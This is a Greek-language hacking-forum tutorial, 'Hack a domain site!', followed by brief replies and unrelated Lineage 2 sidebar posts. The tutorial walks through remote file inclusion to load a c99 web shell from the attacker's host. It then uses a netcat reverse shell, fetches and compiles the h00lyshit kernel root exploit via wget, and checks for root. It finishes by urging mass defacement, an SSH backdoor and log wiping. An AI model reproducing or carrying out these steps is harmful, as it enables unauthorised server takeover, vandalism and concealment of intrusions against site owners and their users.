Jump to content
MaxCheaters Official Group on Discord
-> Place your ad text here <-
We're Rebuilding – Join Our Staff Team

[Hack] [GR]Hack a domain site!

MhtCeR™

By MhtCeR™
in Guides & Tutorials

 Share

Recommended Posts

MhtCeR™ Newbie

MhtCeR™

Posted
Posted

Τα root exploits μας βοηθάνε να αποκτήσουμε δικαιώματα διαχειριστή σε ένα server.

 

Στο παράδειγμα που ακολουθεί σε server με Safe Mod: OFF χρειαζόμαστε:

 

1)Ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I

η ένα shell στον server που θα έχουμε ανεβάσει με κάποιο τρόπο p.x: ftp.

 

2)Ένα shell (c99,r57,storm,locus) η κάποιο άλλο τις επιλογής σας. (Προσοχή γιατί πολλά είναι backdoor και στέλνουν πληροφορίες σε κάποιον χρηστη για το που έχετε το shell,σε ποιον server.

 

http://rapidshare.com/files/164111549/c99.rar

 

3)Προώθηση μιας πόρτας στο router σας p.x: 1500

 

4)Ένα προγραμματάκι : Netcat V1.1

 

http://rapidshare.com/files/164104973/NETCAT_V1.1.rar

 

5)Root exploit το οποιο πρέπει να ταιριάζει με την έκδοση του πυρήνα του server.

 

 

Βρίσκουμε λοιπόν ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I όπως στο παράδειγμα πιο κάτω:

 

http://www.server.com/forum/index.php?page=

 

Μπορούμε να τρέξουμε από το δικό μας server το shell προσθέτοντας το δικό μας σύνδεσμο link στο τέλος:

 

http://www.server.com/forum/index.php?page=http://www.myserver.com/shell.txt?

 

Αυτό το link θα μας φορτώσει το shell όπου μπορούμε να δούμε την έκδοση του πυρήνα p.x:

 

 

 

Μετά από αυτό πρέπει να δημιουργήσουμε μια σύνδεση back connect με τον server χρησιμοποιώντας το ενσωματωμένο module του shell η ανεβάζοντας ένα δικό μας σε ένα φάκελο που μας δίνη το δικαίωμα (writeable).

 

Το πιο εύκολο είναι με το ενσωματωμένο back connect.

 

Ανοίγουμε λοιπόν το Netcat ώστε να είναι σε αναμονή και να περιμένει να γίνει η σύνδεση με το shell πηγαίνοντας:

 

Έναρξη -> Εκτέλεση -> και πληκτρολογούμε cmd

 

Μετά πηγαίνουμε στον φάκελο που είναι εγκατεστημένο το NetCat:

 

π.χ

 

 

   

cd C:\test\Netcat

 

 

 

Και δίνουμε την παρακάτω εντολή:

 

 

   

nc -l -v -n -p 1500

 

 

 

Το NetCat θα μας βγάλει: listening on [any] 1500 ...

 

Στην κεντρική σελίδα του c99 shell πηγαίνουμε εκεί που λέει Tools και στην δεύτερη σειρά παρατηρούμε το Back connection:

 

Εκεί που λέει HOST: βάζουμε την ip μας (μπορούμε να την βρούμε πηγαίνοντας στο site: www.whatismyip.com) και διπλα που λέει Port: 1500 (Είναι η πόρτα που έχουμε ανοίξει στο router μας)

 

Μετά πατάμε connect.

 

Αν τα έχουμε κάνει όλα σωστά θα πρέπει να συνδεθούμε με το netcat και προχωράμε στην διαδικασία του exploit.

 

Θα πρέπει να βρούμε ένα ένα φάκελο που μας δίνει το δικαίωμα (writeable) για να κατεβάσουμε και να κάνουμε compile το Root Exploit, το οποίο θα μας δώσει δικαιώματα διαχειριστή στον server.

 

Για να βρούμε ένα φάκελο που μας δίνει το δικαίωμα (writeable) μπορούμε να τρέξουμε την παρακάτω εντολή:

 

 

   

find / -perm -2 -ls

 

 

 

ή να χρησιμοποιήσουμε το φάκελο tmp που έχει πάντα δικαιώματα writeable.

 

Ας δούμε την περίπτωση του kernel 2.6.9 και την χρήση του φακέλου tmp.

 

Πληκτρολογούμε: cd /tmp

 

Για να κατεβάσουμε το root exploit (αν δεν το έχουμε ήδη έτοιμο compile) χρησιμοποιούμε την εντολή wget:

 

wget http://www.servermeexploits.com/h00lyshit.c

 

Μόλις το κατεβάσουμε θα πρέπει να κάνουμε compile ακολουθώντας τις οδηγίες που βρίσκουμε συνήθως στον κώδικα του exploit.

 

Για το h00lyshit πληκτρολογούμε:

 

 

  

 gcc h00lyshit.c -o h00lyshit

 

 

 

Έτσι δημιουργούμε το εκτελέσιμο αρχείο h00lyshit.

 

Τώρα πρέπει για να το τρέξουμε να δημιουργήσουμε ένα μεγάλο αρχείο στο δίσκο το οποιο χρειάζεται για την σωστή εκτέλεση του.

 

Για να δημιουργήσουμε ένα τέτοιο αρχείο σε κάποιο writeable φάκελο η στο /tmp όπως φαίνεται πιο κάτω στο παράδειγμα μας δίνουμε την εντολή:

 

 

   

dd if=/dev/urandom of=largefile count=2M

 

 

 

("largefile" είναι το όνομα αρχείου που δίνουμε)

 

Περιμένουμε μερικά λεπτά (2-3) μέχρι να ολοκληρωθεί η διαδικασία.

 

Αν δεν ολοκληρωθεί με επιτυχία μπορούμε να δοκιμάσουμε την εντολή:

 

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

 

 

 

Στο τελευταίο στάδιο που είναι η εκτέλεση του exploit δίνουμε την εντολή:

 

 

   

./h00lyshit /tmp/largefile

 

 

 

Αν στον server δεν έχει περαστεί το patch για τον συγκεκριμένο πυρήνα (kernel) θα μας δόση δικαιώματα διαχειριστή (root).

 

Για να το δούμε αυτό πατάμε:

 

 

   

whoami

 

 

 

Αν μας βγάλει root τότε τα κάναμε όλα σωστά !

 

 

Σαν root μπορούμε να κάνουμε όλα τα sites/forums/ deface του server η να βάλουμε κάποιο ssh backdoor όπως το SSHDoor.

 

Καλό θα είναι μετά από όλα αυτά να χρησιμοποιήσουμε κάπιο Log Cleaner όπως το MIG Log Cleaner.

 

Άν βρήτε κάπιο λάθος πείτε μου να το φτιάξω. :)

 

Credits: *Vazelos* (ο οποίος το έστειλε λίγο παλιά στο maxhackers.com)

 

 

Morian Newbie

Morian

Posted
Posted

Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol)

 

 

MhtCeR™ Newbie

MhtCeR™

Posted
  • Author
Posted

Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol)

 

 

 

xD το τελευταίο κάνω σα να μην το είδα :) για τα άλλα δεν ξέρω.... εμένα μου φένεται χρήσιμο guide...

MhtCeR™ Newbie

MhtCeR™

Posted
  • Author
Posted

To guide xrisimo einai, alla poios 8a katsei na ta diabasei ola ayta, poso mallon na ta kanei ki olas.

 

nai dikio exeis... oloi ektos apo legendary,gold,kai moderator einai tempeloskila xD... (e3erountai PANTA kapioi opws ton Coyote™)

 

 

EDITED: thnx kiolas :)

  • 2 weeks later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • MarGaZeaS
      PvP Random Zone

      By MarGaZeaS · Posted

      what pack you use  send me on discord for it
    • cheto45
      PvP Random Zone

      By cheto45 · Posted

      package custom.events.RandomZoneEvent; import java.io.File; import java.util.ArrayList; import java.util.List; import java.util.Random; import java.util.concurrent.ScheduledFuture; import org.w3c.dom.Document; import org.w3c.dom.Node; import org.l2jmobius.commons.threads.ThreadPool; import org.l2jmobius.commons.time.SchedulingPattern; import org.l2jmobius.commons.time.TimeUtil; import org.l2jmobius.commons.util.IXmlReader; import org.l2jmobius.gameserver.managers.ZoneManager; import org.l2jmobius.gameserver.model.StatSet; import org.l2jmobius.gameserver.model.actor.Creature; import org.l2jmobius.gameserver.model.actor.Npc; import org.l2jmobius.gameserver.model.actor.Player; import org.l2jmobius.gameserver.model.quest.Event; import org.l2jmobius.gameserver.model.zone.ZoneId; import org.l2jmobius.gameserver.model.zone.ZoneType; import org.l2jmobius.gameserver.model.zone.type.RandomZone; import org.l2jmobius.gameserver.util.Broadcast; /** * Random Zone Event - Activates one random PvP zone temporarily. No modifica la clase de la zona: usa flags PvP en runtime. * @author Juan */ public class RandomZoneEvent extends Event { private static final String CONFIG_FILE = "data/scripts/custom/events/RandomZoneEvent/config.xml"; private static int EVENT_DURATION_MINUTES = 15; private static boolean _isActive = false; private ScheduledFuture<?> _eventTask = null; private final List<ZoneType> _availableZones = new ArrayList<>(); private ZoneType _activeZone = null; public RandomZoneEvent() { loadConfig(); loadZones(); registerZoneListeners(); } /** * Registra listeners a TODAS LAS ZONAS random */ private void registerZoneListeners() { for (ZoneType zone : _availableZones) { addEnterZoneId(zone.getId()); addExitZoneId(zone.getId()); LOGGER.info("[RandomZoneEvent] Registered listener for zone: " + zone.getName()); } } private void loadConfig() { new IXmlReader() { @Override public void load() { parseDatapackFile(CONFIG_FILE); } @Override public void parseDocument(Document doc, File file) { forEach(doc, "event", eventNode -> { final StatSet att = new StatSet(parseAttributes(eventNode)); final String name = att.getString("name"); for (Node node = eventNode.getFirstChild(); node != null; node = node.getNextSibling()) { if ("schedule".equals(node.getNodeName())) { final StatSet attributes = new StatSet(parseAttributes(node)); final String pattern = attributes.getString("pattern"); final SchedulingPattern schedulingPattern = new SchedulingPattern(pattern); final StatSet params = new StatSet(); params.set("Name", name); params.set("SchedulingPattern", pattern); final long delay = schedulingPattern.getDelayToNextFromNow(); getTimers().addTimer("Schedule_" + name, params, delay + 5000, null, null); LOGGER.info("[RandomZoneEvent] Event " + name + " scheduled at " + TimeUtil.getDateTimeString(System.currentTimeMillis() + delay)); } } }); } }.load(); } private void loadZones() { for (ZoneType zone : ZoneManager.getInstance().getAllZones(RandomZone.class)) { if ((zone.getName() != null) && zone.getName().toLowerCase().startsWith("random_zone")) { _availableZones.add(zone); LOGGER.info("[RandomZoneEvent] Loaded zone: " + zone.getName() + " (id=" + zone.getId() + ")"); } } LOGGER.info("[RandomZoneEvent] Total random zones loaded: " + _availableZones.size()); } @Override public void onTimerEvent(String event, StatSet params, Npc npc, Player player) { if (event.startsWith("Schedule_")) { eventStart(null); final SchedulingPattern schedulingPattern = new SchedulingPattern(params.getString("SchedulingPattern")); final long delay = schedulingPattern.getDelayToNextFromNow(); getTimers().addTimer(event, params, delay + 5000, null, null); LOGGER.info("[RandomZoneEvent] Rescheduled for " + TimeUtil.getDateTimeString(System.currentTimeMillis() + delay)); } } @Override public boolean eventStart(Player eventMaker) { if (_isActive) { if (eventMaker != null) { eventMaker.sendMessage("RandomZoneEvent already active."); } return false; } if (_availableZones.isEmpty()) { Broadcast.toAllOnlinePlayers("[RandomZoneEvent] No zones configured."); return false; } _isActive = true; Broadcast.toAllOnlinePlayers("⚔️ Random Zone Event has started!"); _eventTask = ThreadPool.schedule(this::activateRandomZone, 5_000); return true; } private void activateRandomZone() { _activeZone = _availableZones.get(new Random().nextInt(_availableZones.size())); _activeZone.setEnabled(true); Broadcast.toAllOnlinePlayers("🔥 Random Zone Event: " + _activeZone.getName() + " is now PvP for " + EVENT_DURATION_MINUTES + " minutes!"); _eventTask = ThreadPool.schedule(this::eventStop, EVENT_DURATION_MINUTES * 60 * 1000L); } @Override public boolean eventStop() { if (!_isActive) { return false; } _isActive = false; if (_eventTask != null) { _eventTask.cancel(true); _eventTask = null; } if (_activeZone != null) { _activeZone.setEnabled(false); Broadcast.toAllOnlinePlayers("🏁 Random Zone Event ended. " + _activeZone.getName() + " is back to normal."); _activeZone = null; } else { Broadcast.toAllOnlinePlayers("🏁 Random Zone Event ended."); } return true; } @Override public void onEnterZone(Creature creature, ZoneType zone) { if (!_isActive || (_activeZone == null)) { return; } if ((zone == _activeZone) && creature.isPlayable()) { creature.setInsideZone(ZoneId.PVP, true); if (creature.isPlayer()) { creature.sendMessage("Esta zona está en modo PvP temporalmente."); } } } @Override public void onExitZone(Creature creature, ZoneType zone) { if (!_isActive || (_activeZone == null)) { return; } if ((zone == _activeZone) && creature.isPlayable()) { creature.setInsideZone(ZoneId.PVP, false); if (creature.isPlayer()) { creature.sendMessage("Abandonaste la zona PvP temporal."); } } } @Override public boolean eventBypass(Player player, String bypass) { return true; } @Override public String onEvent(String event, Npc npc, Player player) { return super.onEvent(event, npc, player); } @Override public String onFirstTalk(Npc npc, Player player) { return null; } public static void main(String[] args) { new RandomZoneEvent(); } } i have this but its not working
    • paparas22
      🌟 [RELEASE] Full Lineage 2 C4 Accumulative

      By paparas22 · Posted

      ZonePvPSpawnBossRadio=0 ZonePvPSpawnBossBarakiel=0 at the Customs.ini in L2Server folder. Im prety sure this is it because i had the same problem with you in cruma 1 floor for example and i couldn't fix it but i fixed it finally by changing these 2 lines
    • Atom
      ¡Lineage 2 Traducido al español! La Era de Einhasad x5

      By Atom · Posted

      Good Luck!
    • 4TOP
      L2J4Team - Oath of Blood C5

      By 4TOP · Posted

      Siege Reward Start PM Msg Rework Config root BossDieAnnounce and BossDieSound in the L24Team.properties and Config.java files for global raid boss death notifications and sounds. Adds a new reward_list table to the DB.sql file to track castle rewards. Improves character creation logic for thread safety and validation. Adds extensive state checks to the RequestEnchantItem method to prevent enchantments during inappropriate player states. Fixed auto-attack animation bug (there was no attack animation, only damage animation) Clean Code Other fixes I forgot to list! Java 14 Fixed issue where deleting a character would prevent it from leaving the screen or being removed, or even after a delete CD (it would only exit when re-logging in or creating a new character). Added Premium System from the other C2 project (Needs testing and improvement). Added the "Improved" Community Board (incomplete).

  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock